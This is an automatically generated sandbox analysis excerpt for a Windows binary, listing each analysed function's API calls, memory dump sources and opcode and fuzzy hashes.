                          • Opcode Fuzzy Hash: 9986e2e9f6913c47b6dee714e664151915478677517033b438e7b3db62672416
                          • Instruction Fuzzy Hash: E7310830A00618BFFF35CB658C09BFA7BA5AB45310F04421AE887A21D1D37D99859F72
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 0079769A
                          • GetWindowRect.USER32(?,?), ref: 00797710
                          • PtInRect.USER32(?,?,00798B89), ref: 00797720
                          • MessageBeep.USER32(00000000), ref: 0079778C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: 4e0e1e1bca6c3ee827617e592657e2c48b6b65971d16117df23b878c593f4122
                          • Instruction ID: b4f7045c86b005445fbccba92ba7d98c2517459a55c0208254553642ef0c337c
                          • Opcode Fuzzy Hash: 4e0e1e1bca6c3ee827617e592657e2c48b6b65971d16117df23b878c593f4122
                          • Instruction Fuzzy Hash: 9A41C034619254EFCF05CF98E894EA977F4FF49310F5580A9E4149B261C338E942CF90
                          APIs
                          • GetForegroundWindow.USER32 ref: 007916EB
                            • Part of subcall function 00763A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00763A57
                            • Part of subcall function 00763A3D: GetCurrentThreadId.KERNEL32 ref: 00763A5E
                            • Part of subcall function 00763A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007625B3), ref: 00763A65
                          • GetCaretPos.USER32(?), ref: 007916FF
                          • ClientToScreen.USER32(00000000,?), ref: 0079174C
                          • GetForegroundWindow.USER32 ref: 00791752
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: e3e9739220003e686fe6c07a6f735a753ccc1ed224f70a3eb962f730e1cbd041
                          • Instruction ID: 223bc1d5fc9aae36ba6887397351b906deac8eeba09e24ca5362e2d2de1bc0c9
                          • Opcode Fuzzy Hash: e3e9739220003e686fe6c07a6f735a753ccc1ed224f70a3eb962f730e1cbd041
                          • Instruction Fuzzy Hash: EC319471D00149EFDB00DFA5C885CAEB7FDEF48304B5481AAE415E7251DB34AE41CBA0
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0076D501
                          • Process32FirstW.KERNEL32(00000000,?), ref: 0076D50F
                          • Process32NextW.KERNEL32(00000000,?), ref: 0076D52F
                          • CloseHandle.KERNEL32(00000000), ref: 0076D5DC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: c668a71f97e4488888ae3d11a109051bfedfd46fbc96917d7ac772022332fd3e
                          • Instruction ID: fa896d1c4f3b7c98645d36419d46c9f47cfe8cee7c2079dd2e588b83bfa99d66
                          • Opcode Fuzzy Hash: c668a71f97e4488888ae3d11a109051bfedfd46fbc96917d7ac772022332fd3e
                          • Instruction Fuzzy Hash: 2931C471508300DFD311EF54C885AAFBBF8EF99344F14052DF682821E2EB759945CBA2
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • GetCursorPos.USER32(?), ref: 00799001
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00757711,?,?,?,?,?), ref: 00799016
                          • GetCursorPos.USER32(?), ref: 0079905E
                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00757711,?,?,?), ref: 00799094
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                          • String ID:
                          • API String ID: 2864067406-0
                          • Opcode ID: 68a329ee68990c4b9dd7a64c1f55bc81164c87c13ea0a7a47a863f5df506a0ca
                          • Instruction ID: d3e2633b40c425041a3c917a70a464b6cd9413ea046a16da552c71f5ec5fc6dd
                          • Opcode Fuzzy Hash: 68a329ee68990c4b9dd7a64c1f55bc81164c87c13ea0a7a47a863f5df506a0ca
                          • Instruction Fuzzy Hash: CB21B135600018FFDF268F9DD858EEA7BB9EB49350F10405AF61547261C33AA9A1DB60
                          APIs
                          • GetFileAttributesW.KERNEL32(?,0079CB68), ref: 0076D2FB
                          • GetLastError.KERNEL32 ref: 0076D30A
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0076D319
                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0079CB68), ref: 0076D376
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast
                          • String ID:
                          • API String ID: 2267087916-0
                          • Opcode ID: 8483d3bcdbec73650e797ce9e864e2ab4eb2696e02ae9b30a0251a4b64649bad
                          • Instruction ID: fe2bf9ffbe6593aa59cb6f44af35d170e634a015c0758862fb1f4ea5123fa144
                          • Opcode Fuzzy Hash: 8483d3bcdbec73650e797ce9e864e2ab4eb2696e02ae9b30a0251a4b64649bad
                          • Instruction Fuzzy Hash: AD219170A14201DFC720DF25C88586AB7E4AE55324F504A1DF89AC73E1E738DD46CB93
                          APIs
                            • Part of subcall function 00761014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0076102A
                            • Part of subcall function 00761014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00761036
                            • Part of subcall function 00761014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761045
                            • Part of subcall function 00761014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0076104C
                            • Part of subcall function 00761014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761062
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007615BE
                          • _memcmp.LIBVCRUNTIME ref: 007615E1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00761617
                          • HeapFree.KERNEL32(00000000), ref: 0076161E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                          • String ID:
                          • API String ID: 1592001646-0
                          • Opcode ID: 48b15b3f7e1badc3cec81370d83fd1af516145718ce50bc5b925b300014eb0e5
                          • Instruction ID: dfb20ac7cdf1dc4e77b1733c1743c1aa24073530d49f414592d73df3ce2477f7
                          • Opcode Fuzzy Hash: 48b15b3f7e1badc3cec81370d83fd1af516145718ce50bc5b925b300014eb0e5
                          • Instruction Fuzzy Hash: 0C21A171E40108EFDF01DFA8C949BEEB7B8EF44354F498459E842A7241EB38AE05CB60
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 0079280A
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00792824
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00792832
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00792840
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: 1d96abfcd37d01ecc3fa99691e93c76f235a76a0bcee715d6f79fbd175566c0a
                          • Instruction ID: 76d88a5f65a10c564ce8dc2d9869464f1c21840551da61a9c2032207f37cce50
                          • Opcode Fuzzy Hash: 1d96abfcd37d01ecc3fa99691e93c76f235a76a0bcee715d6f79fbd175566c0a
                          • Instruction Fuzzy Hash: DF21AE31204511BFDB15AB24D849FAA7BA5AF45324F248259E4268B6E3CB79EC43C790
                          APIs
                            • Part of subcall function 00768D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0076790A,?,000000FF,?,00768754,00000000,?,0000001C,?,?), ref: 00768D8C
                            • Part of subcall function 00768D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00768DB2
                            • Part of subcall function 00768D7D: lstrcmpiW.KERNEL32(00000000,?,0076790A,?,000000FF,?,00768754,00000000,?,0000001C,?,?), ref: 00768DE3
                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00768754,00000000,?,0000001C,?,?,00000000), ref: 00767923
                          • lstrcpyW.KERNEL32(00000000,?), ref: 00767949
                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00768754,00000000,?,0000001C,?,?,00000000), ref: 00767984
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          • Opcode ID: 0c0438bf49a932e3f5febb735295a47a27de585b5bc9a99edfb681ef569dbb5d
                          • Instruction ID: a67f301955fa1a74a0722ec6c23b6175cbcefebe686d6e817204a4a848ee91ba
                          • Opcode Fuzzy Hash: 0c0438bf49a932e3f5febb735295a47a27de585b5bc9a99edfb681ef569dbb5d
                          • Instruction Fuzzy Hash: D011293A200301ABCF155F38C844D7A77E9FF45394B40802AFC43C72A4EB399801C765
                          APIs
                          • GetWindowLongW.USER32(?,000000F0), ref: 00797D0B
                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00797D2A
                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00797D42
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0077B7AD,00000000), ref: 00797D6B
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID:
                          • API String ID: 847901565-0
                          • Opcode ID: 32e8d5126b674f0986d112506650f518ef08b1bef2b564bf1c0e9603d114d61a
                          • Instruction ID: 819b89e0c82dbe8851051efae29bd9212bdb68971deca35d1c62840de718cab3
                          • Opcode Fuzzy Hash: 32e8d5126b674f0986d112506650f518ef08b1bef2b564bf1c0e9603d114d61a
                          • Instruction Fuzzy Hash: 3D11CD71225654AFCF158F28EC04AA63BA4AF46360F218325F839CB2F0E7389D51DB60
                          APIs
                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 007956BB
                          • _wcslen.LIBCMT ref: 007956CD
                          • _wcslen.LIBCMT ref: 007956D8
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00795816
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend_wcslen
                          • String ID:
                          • API String ID: 455545452-0
                          • Opcode ID: bbd5eeeec076e389e0c3e93f3e50e528e73ec3566dee459c20f428e063de5601
                          • Instruction ID: 26b665221c0424ebe4ea76aba1897a9e72e184119fb7387140eb9fcca0fed558
                          • Opcode Fuzzy Hash: bbd5eeeec076e389e0c3e93f3e50e528e73ec3566dee459c20f428e063de5601
                          • Instruction Fuzzy Hash: BA11D371600628A6DF21DF61EC85EEE77BCEF11B60B50806AF915D6081E778DA80CB64
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00761A47
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00761A59
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00761A6F
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00761A8A
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0076E1FD
                          • MessageBoxW.USER32(?,?,?,?), ref: 0076E230
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0076E246
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0076E24D
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                          • String ID:
                          APIs
                          • CreateThread.KERNEL32(00000000,?,0072CFF9,00000000,00000004,00000000), ref: 0072D218
                          • GetLastError.KERNEL32 ref: 0072D224
                          • __dosmaperr.LIBCMT ref: 0072D22B
                          • ResumeThread.KERNEL32(00000000), ref: 0072D249
                          Similarity
                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                          • String ID:
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0070604C
                          • GetStockObject.GDI32(00000011), ref: 00706060
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0070606A
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          APIs
                          • ___BuildCatchObject.LIBVCRUNTIME ref: 00723B56
                            • Part of subcall function 00723AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00723AD2
                            • Part of subcall function 00723AA3: ___AdjustPointer.LIBCMT ref: 00723AED
                          • _UnwindNestedFrames.LIBCMT ref: 00723B6B
                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00723B7C
                          • CallCatchBlock.LIBVCRUNTIME ref: 00723BA4
                          Similarity
                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                          • String ID:
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007013C6,00000000,00000000,?,0073301A,007013C6,00000000,00000000,00000000,?,0073328B,00000006,FlsSetValue), ref: 007330A5
                          • GetLastError.KERNEL32(?,0073301A,007013C6,00000000,00000000,00000000,?,0073328B,00000006,FlsSetValue,007A2290,FlsSetValue,00000000,00000364,?,00732E46), ref: 007330B1
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0073301A,007013C6,00000000,00000000,00000000,?,0073328B,00000006,FlsSetValue,007A2290,FlsSetValue,00000000), ref: 007330BF
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0076747F
                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00767497
                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007674AC
                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007674CA
                          Similarity
                          • API ID: Type$Register$FileLoadModuleNameUser
                          • String ID:
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B0C4
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B0E9
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B0F3
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0076ACD3,?,00008000), ref: 0076B126
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00762DC5
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00762DD6
                          • GetCurrentThreadId.KERNEL32 ref: 00762DDD
                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00762DE4
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          APIs
                            • Part of subcall function 00719639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00719693
                            • Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196A2
                            • Part of subcall function 00719639: BeginPath.GDI32(?), ref: 007196B9
                            • Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196E2
                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00798887
                          • LineTo.GDI32(?,?,?), ref: 00798894
                          • EndPath.GDI32(?), ref: 007988A4
                          • StrokePath.GDI32(?), ref: 007988B2
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          APIs
                          • GetSysColor.USER32(00000008), ref: 007198CC
                          • SetTextColor.GDI32(?,?), ref: 007198D6
                          • SetBkMode.GDI32(?,00000001), ref: 007198E9
                          • GetStockObject.GDI32(00000005), ref: 007198F1
                          Similarity
                          • API ID: Color$ModeObjectStockText
                          • String ID:
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 00761634
                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,007611D9), ref: 0076163B
                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007611D9), ref: 00761648
                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,007611D9), ref: 0076164F
                          Similarity
                          • API ID: CurrentOpenProcessThreadToken
                          • String ID:
                          APIs
                          • GetDesktopWindow.USER32 ref: 0075D858
                          • GetDC.USER32(00000000), ref: 0075D862
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0075D882
                          • ReleaseDC.USER32(?), ref: 0075D8A3
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          APIs
                          • GetDesktopWindow.USER32 ref: 0075D86C
                          • GetDC.USER32(00000000), ref: 0075D876
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0075D882
                          • ReleaseDC.USER32(?), ref: 0075D8A3
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          APIs
                            • Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625
                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00774ED4
                          Strings
                          Similarity
                          • API ID: Connection_wcslen
                          • String ID: *$LPT
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 0072E30D
                          Strings
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: 1a88bc8b0de8f602c59c1ab3208ff26d0d59eea106f6273432b6158dcc4b6f52
                          • Instruction ID: db63a0f3cf686d6314ca15daac884ad3203ae0741cf32d1649ccc31f64b4c37b
                          • Instruction Fuzzy Hash: 345180E1A1C102D6EB39B718ED453793BA4EF40741F308958F4D6462EBEB3D8C81DA46
                          APIs
                          • CharUpperBuffW.USER32(0075569E,00000000,?,0079CC08,?,00000000,00000000), ref: 007878DD
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • CharUpperBuffW.USER32(0075569E,00000000,?,0079CC08,00000000,?,00000000,00000000), ref: 0078783B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: BuffCharUpper$_wcslen
                          • String ID: <s|
                          • API String ID: 3544283678-2408698564
                          • Opcode ID: 2ee6f293f38dcf81590dadeeab0fc4d311f5f7be6aab73a69f34197a1e2d8b27
                          • Instruction ID: 20ce6976da44fd6cf6fdc0c53e068bd3e541a84215595a174a5775d2d2755b25
                          • Instruction Fuzzy Hash: F4612E72954219EACF09FBA4CC95DFDB3B8BF14700B544229E543A71D1EF38AA45CBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: #
                          • API String ID: 0-1885708031
                          • Opcode ID: 4b5e6a74a161badc77b773ddf4be090ba19e3695976b605a847bcb2ffb19eb05
                          • Instruction ID: fac7f0df898cfa2557e85548c5af8b3b4e6378943e154320294702d44b156651
                          • Instruction Fuzzy Hash: 13515271900256DFDB19DF28C091AFA7BA8FF19310F248415FC919B2C0DA7C9E86CBA0
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 0071F2A2
                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0071F2BB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          • Opcode ID: 8efcffff956792ab538e8cf6f83ec60e7a66333e3024ee517f72ffe924012c28
                          • Instruction ID: 759c0322980b015ac703704a3c7b4c033dc6a8b7d2531de174c92989b4a9e0a8
                          • Instruction Fuzzy Hash: D7512772408745DBD320AF10D88ABABBBF8FB84300F818A5DF19941195EB749529CB67
                          APIs
                          • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 007857E0
                          • _wcslen.LIBCMT ref: 007857EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
